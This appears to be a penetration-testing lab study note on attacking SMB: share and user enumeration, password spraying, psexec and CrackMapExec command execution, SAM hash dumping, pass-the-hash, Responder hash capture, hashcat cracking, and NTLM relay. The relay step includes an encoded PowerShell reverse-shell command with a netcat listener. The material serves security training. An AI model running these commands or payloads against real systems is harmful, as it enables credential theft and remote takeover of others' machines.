Attacking SMB
Enumeration
Depending on the SMB implementation and the OS, you will get different information using Nmap. Keep in mind that when targeting Windows OS, version information is usually not included as part of the Nmap scan results. Instead, nmap will try to guess the OS version. However, you will often need other scans to identify if the target is vulnerable to a particular exploit.
d41y@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 00:00:00:00:00:00 (VMware)
Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-19T13:16:04
|_ start_date: N/A
The Nmap scan reveals essential information about the target:
- SMB version
- Hostname
- OS is Linux based on SMB implementation
Misconfigurations
SMB can be configured not to require authenticaton, which is often called a null session. Instead, you can log in to a system with no username or password.
Anonymous Authentication
If you find an SMB server that does not require a username and password or find valid credentials, you can get a list of shares, usernames, groups, permissions, policies, services, etc. Most tools that interact with SMB allow null session connectivity, including smbclient, smbmap, rpcclient, or enum4linux.
Using smbclient, you can display a list of the server’s shares with the option -L, and using the option -N, you tell smbclient to use the null session.
d41y@htb[/htb]$ smbclient -N -L //10.129.14.128
Sharename Type Comment
------- -- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
notes Disk CheckIT
IPC$ IPC IPC Service (DEVSM)
SMB1 disabled no workgroup available
Smbmap is another tool that helps you enumerate network shares and access associated permissions. An advantage of smbmap is that it provides a list of permissions for each shared folder.
d41y@htb[/htb]$ smbmap -H 10.129.14.128
[+] IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
-- --------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY IPC Service (DEVSM)
notes READ, WRITE CheckIT
Using smbmap with the -r or -R option, one can browse the directories.
d41y@htb[/htb]$ smbmap -H 10.129.14.128 -r notes
[+] Guest session IP: 10.129.14.128:445 Name: 10.129.14.128
Disk Permissions Comment
-- --------- -------
notes READ, WRITE
.\notes\*
dr--r--r 0 Mon Nov 2 00:57:44 2020 .
dr--r--r 0 Mon Nov 2 00:57:44 2020 ..
dr--r--r 0 Mon Nov 2 00:57:44 2020 LDOUJZWBSG
fw--w--w 116 Tue Apr 16 07:43:19 2019 note.txt
fr--r--r 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp
dr--r--r 0 Mon Nov 2 00:54:57 2020 TPLRNSMWHQ
dr--r--r 0 Mon Nov 2 00:56:51 2020 WDJEQFZPNO
dr--r--r 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
From the above examples, the permissions are set to READ and WRITE, which one can use to upload and download the files.
d41y@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
[+] Starting download: notes\note.txt (116 bytes)
[+] File output to: /htb/10.129.14.128-notes_note.txt
...
d41y@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
[+] Starting upload: test.txt (20 bytes)
[+] Upload complete.
Remote Procedure Call (RPC)
You can use the rpcclient tool with a null session to enumerate a workstation or DC.
The rpcclient tool offers you many different commands to execute specific functions on the SMB server to gather information or modify server attributes like a username.
d41y@htb[/htb]$ rpcclient -U'%' 10.10.110.17
rpcclient $> enumdomusers
user:[mhope] rid:[0x641]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
Enum4linux is another utility that supports null sessions, and it utilizes nmblookup, net, rpcclient, and smbclient to automate some common enumeration from SMB targets such as:
- workgroup/domain name
- users information
- OS information
- group information
- shares folders
- password policy information
d41y@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 10.10.11.45
[*] Username ......... ''
[*] Random Username .. 'noyyglci'
[*] Password ......... ''
====================================
| Service Scan on 10.10.11.45 |
====================================
[*] Checking LDAP (timeout: 5s)
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS (timeout: 5s)
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB (timeout: 5s)
[*] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS (timeout: 5s)
[*] SMB over NetBIOS is accessible on 139/tcp
===================================================
| NetBIOS Names and Workgroup for 10.10.11.45 |
===================================================
[*] Got domain/workgroup name: WORKGROUP
[*] Full NetBIOS names information:
- WIN-752039204 <00> - B <ACTIVE> Workstation Service
- WORKGROUP <00> - B <ACTIVE> Workstation Service
- WIN-752039204 <20> - B <ACTIVE> Workstation Service
- MAC Address = 00-0C-29-D7-17-DB
...
========================================
| SMB Dialect Check on 10.10.11.45 |
========================================
<SNIP>
Protocol Specific Attacks
Without Credentials
Brute Forcing and Password Spraying
If a null session is not enabled, you will need credentials to interact with the SMB protocol. Two common ways to obtain credentials are brute-forcing and password spraying.
When brute-forcing, you try as many passwords as possible against an account, but it can lock out an account if you hit the threshold. You can use brute-forcing and stop before reaching the threshold if you know it. Otherwise, it is not recommended using brute force.
Password spraying is a better alternative since you can target a list of usernames with one common password to avoid account lockups. You can try more than one password if you know the account lockup threshold. Typically, two to three attempts are safe, provided with a wait 30-60 minutes between attemps.
With CrackMapExec, you can target multiple IPs, using numerous users and passwords. To perform a spray against one IP, you can use the option -u to specify a file with a user list and -p to specify a password. This will attempt to authenticate every user from the list using the provided password.
d41y@htb[/htb]$ cat /tmp/userlist.txt
Administrator
jrodriguez
admin
<SNIP>
jurena
...
d41y@htb[/htb]$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\Administrator:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\jrodriguez:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\admin:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\eperez:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\amone:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\fsmith:Company01! STATUS_LOGON_FAILURE
SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\tcrash:Company01! STATUS_LOGON_FAILURE
<SNIP>
SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\jurena:Company01! (Pwn3d!)
With Credentials
When attacking a Windows SMB server, your actions will be limited by the privileges you had on the user you manage to compromise. If this user is an Administrator or has specific privileges, you will be able to perform operations such as:
- remote command execution
- extract hashes from SAM database
- enumerating logged-on users
- pass-the-hash
Impacket PsExec
To use impacket-psexec, you need to provide the domain/username, the password, and the IP address of your target machine.
To connect to a remote machine with a local administrator account, using impacket-psexec, you can use the following command:
d41y@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.110.17.....
[*] Found writable share ADMIN$
[*] Uploading file EHtJXgng.exe
[*] Opening SVCManager on 10.10.110.17.....
[*] Creating service nbAc on 10.10.110.17.....
[*] Starting service nbAc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami && hostname
nt authority\system
WIN7BOX
The same options apply to impacket-smbexec and impacket-atexec.
CrackMapExec
Another tool you can use to run CMD or PowerShell is CrackMapExec. One advantage of it is the availability to run a command on multiple hosts at a time. To use it, you need to specify the protocol, the IP address or IP address range, the option -u for username, and -p for the password, and the option -x to run cmd commands or uppercase -X to run PowerShell commands.
d41y@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:.) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [+] .\Administrator:Password123! (Pwn3d!)
SMB 10.10.110.17 445 WIN7BOX [+] Executed command via smbexec
SMB 10.10.110.17 445 WIN7BOX nt authority\system
Enumerating Logged-on Users
d41y@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB 10.10.110.17 445 WIN7BOX [+] Enumerated loggedon users
SMB 10.10.110.17 445 WIN7BOX WIN7BOX\Administrator logon_server: WIN7BOX
SMB 10.10.110.17 445 WIN7BOX WIN7BOX\jurena logon_server: WIN7BOX
SMB 10.10.110.21 445 WIN10BOX [*] Windows 10.0 Build 19041 (name:WIN10BOX) (domain:WIN10BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.21 445 WIN10BOX [+] WIN10BOX\Administrator:Password123! (Pwn3d!)
SMB 10.10.110.21 445 WIN10BOX [+] Enumerated loggedon users
SMB 10.10.110.21 445 WIN10BOX WIN10BOX\demouser logon_server: WIN10BOX
Extract Hashes from SAM Database
d41y@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB 10.10.110.17 445 WIN7BOX [+] Dumping SAM hashes
SMB 10.10.110.17 445 WIN7BOX Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB 10.10.110.17 445 WIN7BOX Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.110.17 445 WIN7BOX DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.110.17 445 WIN7BOX WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5717e1619e16b9179ef2e7138c749d65:::
SMB 10.10.110.17 445 WIN7BOX jurena:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
SMB 10.10.110.17 445 WIN7BOX demouser:1002:aad3b435b51404eeaad3b435b51404ee:4c090b2a4a9a78b43510ceec3a60f90b:::
SMB 10.10.110.17 445 WIN7BOX [+] Added 6 SAM hashes to the database
PtH
d41y@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\Administrator:2B576ACBE6BCFDA7294D6BD18041B8FE (Pwn3d!)
Forced Authentication Attacks
You can also abuse the SMB protocol by creating a fake SMB server to capture users’ NetNTLM v1/v2 hashes.
The most common tool to perform such operations is the Responder. Responder is an LLMNR, NBT-NS, and MDNS poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes. In its default config, it will find LLMNR and NBT-NS traffic. Then, it will respond on behalf of the servers the victim is looking for and capture their NetNTLM hashes.
d41y@htb[/htb]$ responder -I <interface name>
When a user or a system tries to perform a Name Resolution (NR), a series of procedures are conducted by a machine to retrieve a host’s IP address by its hostname. On Windows machines, the procedure will roughly be as follows:
- The hostname file share’s IP address is required.
- The local host file (C:\Windows\System32\Drivers\etc\hosts) will be checked for suitable records.
- If no records are found, the machine switches to the local DNS cache, which keeps track of recently resolved names.
- Is there no local DNS record? A query will be sent to the DNS server that has been configured.
- If all else fails, the machine will issue a multicast query, requesting the IP address of the file share from other machines on the network.
Suppose a user mistyped a shared folder’s name \\mysharefolder\ instead of \\mysharedfolder\. In that case, all name resolutions will fail because the name does not exist, and the machine will send a multicast query to all devices on the network, including you running your fake SMB server. This is a problem because no measures are taken to verify the integrity of the responses. Attackers can take advantage of this mechanism by listening on such queries and spoofing responses, leading the victim to believe malicious servers are trustworthy. This trust is usually used to steal credentials.
d41y@htb[/htb]$ sudo responder -I ens33
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.198]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-2TY1Z1CIGXH]
Responder Domain Name [HF2L.LOCAL]
Responder DCE-RPC Port [48162]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17 for name mysharefoder.local
[*] [LLMNR] Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17 for name mysharefoder.local
[SMB] NTLMv2-SSP Client : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:0101000000000000B09B51939BA6D40140C54ED46AD58E890000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000000000000003000004289286EDA193B087E214F3E16E2BE88FEC5D9FF73197456C9A6861FF5B5D3330000000000000000
These captured credentials can be cracked using hashcat or relayed to a remote host to complete the authentication and impersonate the user.
All saved hashes are located in Responder’s logs directory. You can copy the hash to a file and attempt to crack it using the hashcat module 5600.
d41y@htb[/htb]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<SNIP>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921355
* Keyspace..: 14344386
ADMINISTRATOR::WIN-487IMQOIA8E:997b18cc61099ba2:3cc46296b0ccfc7a231d918ae1dae521:0101000000000000b09b51939ba6d40140c54ed46ad58e890000000002000e004e004f004d00410054004300480001000a0053004d0042003100320004000a0053004d0042003100320003000a0053004d0042003100320005000a0053004d0042003100320008003000300000000000000000000000003000004289286eda193b087e214f3e16e2be88fec5d9ff73197456c9a6861ff5b5d3330000000000000000:P@ssword
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: ADMINISTRATOR::WIN-487IMQOIA8E:997b18cc61099ba2:3cc...000000
Time.Started.....: Mon Apr 11 16:49:34 2022 (1 sec)
Time.Estimated...: Mon Apr 11 16:49:35 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1122.4 kH/s (1.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 75776/14344386 (0.53%)
Rejected.........: 0/75776 (0.00%)
Restore.Point....: 73728/14344386 (0.51%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: compu -> kodiak1
Started: Mon Apr 11 16:49:34 2022
Stopped: Mon Apr 11 16:49:37 2022
The NTLMv2 hash was cracked. The password is P@ssword. If you cannot crack the hash, you can potentially relay the captured hash to another machine using impacket-ntlmrelayx or Responder MultiRelay.py.
First, you need to set SMB to OFF in your Responder config (/etc/responder/Responder.conf).
d41y@htb[/htb]$ cat /etc/responder/Responder.conf | grep 'SMB ='
SMB = Off
Then you execute impacket-ntlmrelayx with the option --no-http-server, -smb2support, and the target machine with the option -t. By default, impacket-ntlmrelayx will dump the SAM database, but you can execute commands by adding the option -c.
d41y@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
<SNIP>
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from /ADMINISTRATOR@10.10.110.1 controlled, attacking target smb://10.10.110.146
[*] Authenticating against smb://10.10.110.146 as /ADMINISTRATOR SUCCEED
[*] SMBD-Thread-3: Connection from /ADMINISTRATOR@10.10.110.1 controlled, but there are no more targets left!
[*] SMBD-Thread-5: Connection from /ADMINISTRATOR@10.10.110.1 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xeb0432b45874953711ad55884094e9d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:92512f2605074cfc341a7f16e5fabf08:::
demouser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Done dumping SAM hashes for host: 10.10.110.146
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
You can create a PowerShell reverse shell.
d41y@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'
Once the victim authenticates to your server, you poison the response and make it execute your command to obtain a reverse shell.
d41y@htb[/htb]$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.110.133] from (UNKNOWN) [10.10.110.146] 52471
PS C:\Windows\system32> whoami;hostname
nt authority\system
WIN11BOX
Latest Vulnerabilities
CVE-2020-0796
This vulnerability consisted of a compression mechanism of the version SMB v3.1.1 which made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. The vulnerability allowed the attacker to gain RCE and full access to the remote target system.
Concept of the Attack
In simple terms, this is an integer overflow vulnerability in a function of an SMB driver that allows system commands to be overwritten while accessing memory. An integer overflow results from a CPU attempting to generate a number that is greater than the value required for the allocated memory space. Arithmetic operations can always return unexpected values, resulting in an error. An example of an integer overflow can occur when a programmer does not allow a negative number to occur. In this case, an integer overflow occurs when a variable performs an operation that results in a negative number, and the variable is returned as a positive integer. This vulnerability occured because, at the time, the function lacked bounds checks to handle the size of the data sent in the process of SMB session negotiation.
The vuln occurs while processing a malformed compressed message after the Negotiate Protocol Responses. If the SMB server allows requests, compression is generally supported, where the server and the client set the terms of communication before the client sends any more data. Suppose the data transmitted exceeds the integer variable limits due to the excessive amount of data. In that case, these parts are written into the buffer, which leads to the overwriting of the subsequent CPU instructions and interrupts the process’s normal or planned execution. These data sets can be structured so that the overwritten instructions are replaced with your own ones, and thus you force the CPU to perform other tasks and instructions.